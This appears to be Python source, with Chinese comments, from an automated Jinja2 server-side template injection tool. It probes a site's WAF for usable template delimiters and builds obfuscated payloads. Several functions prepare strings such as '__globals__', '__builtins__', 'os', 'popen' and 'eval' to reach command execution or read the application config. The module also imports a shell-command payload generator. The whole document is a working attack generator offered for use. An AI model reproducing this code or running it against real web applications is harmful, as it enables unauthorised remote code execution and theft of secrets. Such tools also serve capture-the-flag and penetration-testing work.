            params = self.extra_params.copy()
            params.update(kwargs.get("params", {}))
            kwargs["params"] = params
        if self.extra_data:
            if kwargs["method"] not in ("POST", "PUT", "DELETE", "PATCH"):
                logger.warning(
                    "Method %s might not need a request body, still adding extra data anyway.",
                    kwargs["method"],
                )
            data = self.extra_data.copy()
            data.update(kwargs.get("data", {}))
            kwargs["data"] = data
        for _ in range(self.retry_times):
            resp = self.request_once(**kwargs)
            if resp is not None:
                return resp
        return None



"""生成获取config的payload

"""

from typing import Dict, Union

from .const import CONFIG, WafFunc
from .full_payload_gen import FullPayloadGen

full_payload_store: Dict[int, FullPayloadGen] = {}


def config_payload(waf_func: WafFunc) -> Union[str, None]:
    """根据提供的waf函数生成读取config的payload

    Args:
        waf_func (WafFunc): waf函数，判断提供的payload能否通过waf, 能则返回True

    Returns:
        Union[str, None]: payload
    """
    full_payload = None
    if id(waf_func) not in full_payload_store:
        full_payload = FullPayloadGen(waf_func)
        full_payload_store[id(waf_func)] = full_payload
    else:
        full_payload = full_payload_store[id(waf_func)]
    payload, will_print = full_payload.generate(CONFIG)
    if not will_print:
        return None
    return payload



"""完整payload的生成器，生成包括双花括号在内的所有部分

"""

import logging
import sys

from . import payload_gen
from .colorize import colored
from .context_vars import (
    get_context_vars_manager,
    ContextVariableManager,
)
from .const import (
    DetectMode,
    SET_STMT_PATTERNS,
    CALLBACK_PREPARE_FULLPAYLOADGEN,
    CALLBACK_GENERATE_FULLPAYLOAD,
    STRING,
    INTEGER,
    OS_POPEN_READ,
    EVAL,
    WafFunc,
)
from .options import Options

if sys.version_info >= (3, 8):
    from typing import Callable, Tuple, Union, Dict, Any, List, Literal
else:
    from typing_extensions import Callable, Tuple, Union, Dict, Any, List, Literal

logger = logging.getLogger("full_payload_gen")


def get_outer_pattern(
    waf_func: Callable,
) -> Union[Tuple[str, bool], Tuple[None, None]]:
    """根据WAF函数获取payload最外层的结构，一般为双花括号

    Args:
        waf_func (Callable): WAF函数

    Returns:
        Union[Tuple[str, bool], Tuple[None, None]]:
            最外层的结构，以及这个结构是否会产生回显
            生成失败则返回None
    """
    outer_payloads = [
        (
            outer_pattern.replace("${WS}", whitespace).replace("PAYLOAD", payload),
            outer_pattern.replace("${WS}", whitespace),
            will_print,
        )
        for outer_pattern, will_print in [
            ("${WS}{{${WS}PAYLOAD${WS}}}${WS}", True),
            ("${WS}{%${WS}print PAYLOAD${WS}%}${WS}", True),
            ("${WS}{%${WS}print(${WS}PAYLOAD${WS})${WS}%}${WS}", True),
            ("${WS}{%${WS}set x=${WS}PAYLOAD${WS}%}${WS}", False),
            (" {% if(PAYLOAD) %} {% endif %}", False),
            (
                "{%for x in ((PAYLOAD),)%}x{%endfor%}",
                False,
            ),
        ]
        for whitespace in ["", " ", "\t", "\n"]
        for payload in [
            "",
            # trying to trigger render error
            "[][",
            "()(",
            "***",
        ]
    ]
    for test_payload, outer_pattern, will_print in outer_payloads:
        if waf_func(test_payload):
            return outer_pattern, will_print
        else:
            logger.warning("Test pattern %s failed", colored("blue", outer_pattern))
    logger.warning(
        "Every pattern we know is %s There is %s we can generate anything!",
        colored("red", "BANNED!", bold=True),
        colored("red", "Noway", bold=True),
    )
    return None, None


def context_payloads_to_context(
    context_payload: Dict[str, Dict[str, Any]]
) -> Dict[str, Any]:
    """将context_payload转换成context字典。

    Args:
        context_payload (Dict[str, Dict[str, Any]]): 一个存储着payload以及对应上下文的字典

    Returns:
        Dict[str, Any]: 一个字典，键是变量名，值是变量值
    """
    return {
        var_name: var_value
        for _, d in context_payload.items()
        for var_name, var_value in d.items()
    }


class FullPayloadGen:
    """接受一个waf函数并负责生成payload
    waf函数接受一个字符串并返回这个字符串是否可以通过WAF
    payload由两部分组成：
        - 前方提供变量等上下文的上下文payload（一般为{%set xxx=xxx%}的形式）
        - 以及后方实际发挥作用的作用payload（一般被双花括号{{}}包裹）
    这个对象主要管理两个子对象的状态：
    - payload_gen: 表达式生成器，负责生成`"ls"" /"`等表达式
    - context_vars: 上下文变量管理器
        - 其中包含多个形如`{%set xxxx%}`的payload、他们对应的变量以及payload依赖的变量
        - 其可以产生一个context字典（包含其中所有变量的名字和值），这个字典需要被传给payload_gen
    """

    def __init__(
        self,
        waf_func: WafFunc,
        callback: Union[Callable[[str, Dict], None], None] = None,
        options: Union[Options, None] = None,
        waf_expr_func: Union[WafFunc, None] = None,
    ):
        self.waf_func = waf_func
        self.prepared = False
        self.extra_context_vars_prepared = False
        self.added_extra_context_vars = set()
        self._callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.context_vars: Union[ContextVariableManager, None] = None
        self.outer_pattern, self.will_print = None, None
        self.payload_gen = None
        self.options = options if options else Options()
        self.waf_expr_func = waf_expr_func

    @property
    def callback(self):
        """Callback函数，在进行某些步骤是会被调用以传递运行时的信息

        Returns:
            Callable: callback函数
        """
        return self._callback

    @callback.setter
    def callback(self, callback):
        self._callback = callback
        if self.payload_gen:
            self.payload_gen.callback = callback

    def do_prepare(self) -> bool:
        """为生成最后的payload准备一系列值
        - 准备作用payload的最外层（一般为双花括号{{}}）
        - 过滤所有可用的payload，在所有形如`{%set xxx%}`的payload中找出可以通过WAF的payload
        - 事先生成一系列字符串的表达式并使用set设置
        - 基于上面的内容产生payload_gen实例

        Returns:
            bool: 是否生成成功，失败则无法生成payload。
        """
        if self.prepared:
            return True

        self.context_vars = get_context_vars_manager(self.waf_func, self.options)

        self.outer_pattern, self.will_print = get_outer_pattern(self.waf_func)
        if not self.outer_pattern:
            return False
        if self.will_print:
            logger.info("use %s", colored("blue", self.outer_pattern))
        else:
            logger.warning(
                "use %s, which %s your result!",
                colored("blue", self.outer_pattern),
                colored("red", "will not print"),
            )

        self.payload_gen = payload_gen.PayloadGenerator(
            self.waf_func,
            self.context_vars.get_context(),
            self.callback,
            options=self.options,
            waf_expr_func=self.waf_expr_func,
        )
        self.prepared = True
        self.callback(
            CALLBACK_PREPARE_FULLPAYLOADGEN,
            {
                "context": self.context_vars.get_context(),
                "outer_pattern": self.outer_pattern,
                "will_print": self.will_print,
            },
        )
        return True

    def try_add_context_var(
        self, value: str, clean_cache=True
    ) -> Literal["success", "failed", "skip"]:
        """尝试添加{%set xxx=yyy%}形式的payload，为最终的payload添加变量

        Args:
            value (str): 变量的值
            clean_cache (bool, optional): 是否清除payload_gen的缓存. Defaults to True.

        Returns:
            Literal["success", "failed", "skip"]: 是否成功
        """
        if not self.prepared and not self.do_prepare():
            return "failed"
        assert self.payload_gen and self.context_vars, "We should have these prepared"
        pattern = None
        for fill_pattern, test_pattern in SET_STMT_PATTERNS:
            if self.waf_func(test_pattern):
                pattern = fill_pattern
                break
        if pattern is None:
            return "failed"
        value_type = {str: STRING, int: INTEGER}[type(value)]
        ret = self.payload_gen.generate_detailed(value_type, value)
        if ret is None:
            return "failed"
        expression, used_context, _ = ret

        if len(expression) - len(repr(value)) < 3:
            logger.warning(
                "Generated expression %s is too simple, skip it.",
                colored("blue", expression),
            )
            return "skip"

        # 变量名需要可以通过waf且不重复
        var_name = self.context_vars.generate_related_variable_name(value)
        if not var_name:
            var_name = self.context_vars.generate_random_variable_name()
        if not var_name:
            return "failed"

        # 保存payload、对应的变量以及payload依赖的变量
        payload = pattern.replace("NAME", var_name).replace("EXPR", expression)
        success = self.add_context_variable(
            payload, {var_name: value}, check_waf=True, depends_on=used_context
        )
        if not success:
            return "failed"
        # 需要清除缓存，否则生成器只会使用缓存的表达式而不会使用加入的变量
        if clean_cache:
            self.payload_gen.cache_by_repr.clear()
        else:
            self.payload_gen.delete_from_cache(STRING, value)
        logger.info(
            "Adding %s with %s",
            colored("yellow", repr(value)),
            colored("blue", payload),
        )
        return "success"

    def prepare_extra_context_vars(self, append_targets: List[str]):
        """生成一系列字符串的变量并加入到context payloads中

        Args:
            append_targets (list): 指定更多需要生成的字符串
        """
        targets = [
            1,
            4,
            37,  # '%'
            128,
            "urlencode",
            "%",
            "c",
            "%c",
            "__",
            "class",
            "globals",
            "init",
            "dict",
            "builtins",
            "getitem",
            "import",
            "add",
            "mul",
            "mod",
            "os",
            "popen",
            "read",
            "pop",
            "get",
            "eval",
            "bytes",
            "decode",
            "chr",
            "truediv",
            "pos",
            "concat",
            "big",
            "doc",
            "attr",
            "__class__",
            "__globals__",
            "__init__",
            "__dict__",
            "__builtins__",
            "__getitem__",
            "__import__",
            "__add__",
            "__mul__",
            "__mod__",
            "__truediv__",
            "__doc__",
            "%",
            "c",
            "%s%s",
            "%s%%s",
            "%c",  # try to regenerate
        ] + append_targets
        if not self.prepared and not self.do_prepare():
            return
        if not any(
            self.waf_func(test_pattern) for _, test_pattern in SET_STMT_PATTERNS
        ):
            logger.warning("We cannot set any variable through {%set %}, continue...")
            return
        assert self.payload_gen is not None, "when prepared, we should have payload_gen"
        logger.info(
            "Adding some string variables...",
        )
        for target in targets:
            if target in self.added_extra_context_vars:
                continue
            result = self.try_add_context_var(target, clean_cache=False)
            if result == "failed":
                logger.warning("Failed generating %s", colored("yellow", repr(target)))
                continue
            if result == "success":
                self.added_extra_context_vars.add(target)
            # if result == "skip":

    def add_context_variable(
        self,
        payload: str,
        context_vars: Dict[str, Any],
        check_waf: bool = True,
        depends_on: Union[Dict[str, Any], None] = None,
    ) -> bool:
        """将上下文变量以及其的payload加入到payload_gen和context_vars中

        Args:
            payload (str): 上下文变量的payload
            context_vars (Dict[str, Any]): payload对应的上下文变量
            check_waf (bool, optional): 是否检查payload可以通过WAF. Defaults to True.
            depends_on (Union[Dict[str, Any], None], optional): payload依赖的变量. Defaults to None.

        Raises:
            RuntimeError: 没有事先调用.do_prepare()则抛出错误

        Returns:
            bool: 是否添加成功，如果WAF检测失败或者变量重名则添加失败
        """
        if not self.prepared:
            raise RuntimeError("Please run .do_prepare() first")
        assert self.payload_gen is not None and self.context_vars is not None
        success = self.context_vars.add_payload(
            payload=payload,
            variables=context_vars,
            depends_on=depends_on,
            check_waf=check_waf,
        )
        if not success:
            return False
        self.payload_gen.context = self.context_vars.get_context()
        return True

    def generate_with_tree(
        self, gen_type, *args
    ) -> Union[Tuple[str, bool, payload_gen.TargetAndSubTargets], None]:
        """根据要求生成payload

        Args:
            gen_type (str): 生成payload的类型，应传入如OS_POPEN_READ等在const.py中定义的类型

        Returns:
            Tuple[Union[str, None], Union[bool, None]]:
                payload, 以及payload是否会有回显
        """
        # 需要准备context payload和表达式外部的包裹，然后使用assert检查是否正确
        if not self.prepared and not self.do_prepare():
            return None
        assert self.payload_gen is not None and self.context_vars is not None
        assert isinstance(self.outer_pattern, str) and self.will_print is not None

        # 在生成模式不是快速时生成一系列的字符串变量以减少嵌套括号
        if self.options.detect_mode != DetectMode.FAST:
            # 添加一系列值为字符串的变量，需要从生成目标中取出需要生成的字符串
            extra_strings = []
            if gen_type == OS_POPEN_READ:
                extra_strings = [args[0]]
            elif gen_type == EVAL and args[0][0] == STRING:
                extra_strings = [args[0][1]]
            self.prepare_extra_context_vars(extra_strings)

        logger.info("Start generating final expression...")

        # 生成并检查
        ret = self.payload_gen.generate_detailed(gen_type, *args)

        if ret is None:
            logger.warning("Bypassing WAF Failed.")
            return None
        inner_payload, used_context, tree = ret
        context_payload = self.context_vars.get_payload(used_context)

        # 产生最终的payload
        payload = context_payload + self.outer_pattern.replace("PAYLOAD", inner_payload)

        self.callback(
            CALLBACK_GENERATE_FULLPAYLOAD,
            {
                "gen_type": gen_type,
                "args": args,
                "payload": payload,
                "will_print": self.will_print,
            },
        )
        if not self.will_print:
            logger.warning(
                "use %s, which %s your result!",
                colored("blue", self.outer_pattern),
                colored("red", "will not print"),
            )
        return (payload, self.will_print, tree)

    def generate(self, gen_type, *args) -> Tuple[Union[str, None], Union[bool, None]]:
        """根据要求生成payload

        Args:
            gen_type (str): 生成payload的类型，应传入如OS_POPEN_READ等在const.py中定义的类型

        Returns:
            Tuple[Union[str, None], Union[bool, None]]:
                payload, 以及payload是否会有回显
        """
        result = self.generate_with_tree(gen_type, *args)
        if result:
            return result[:2]
        return None, None



from . import payload_gen, const
from .full_payload_gen import FullPayloadGen
from .shell_payload import exec_cmd_payload
from .config_payload import config_payload
from .form import get_form, fill_form
from .options import Options
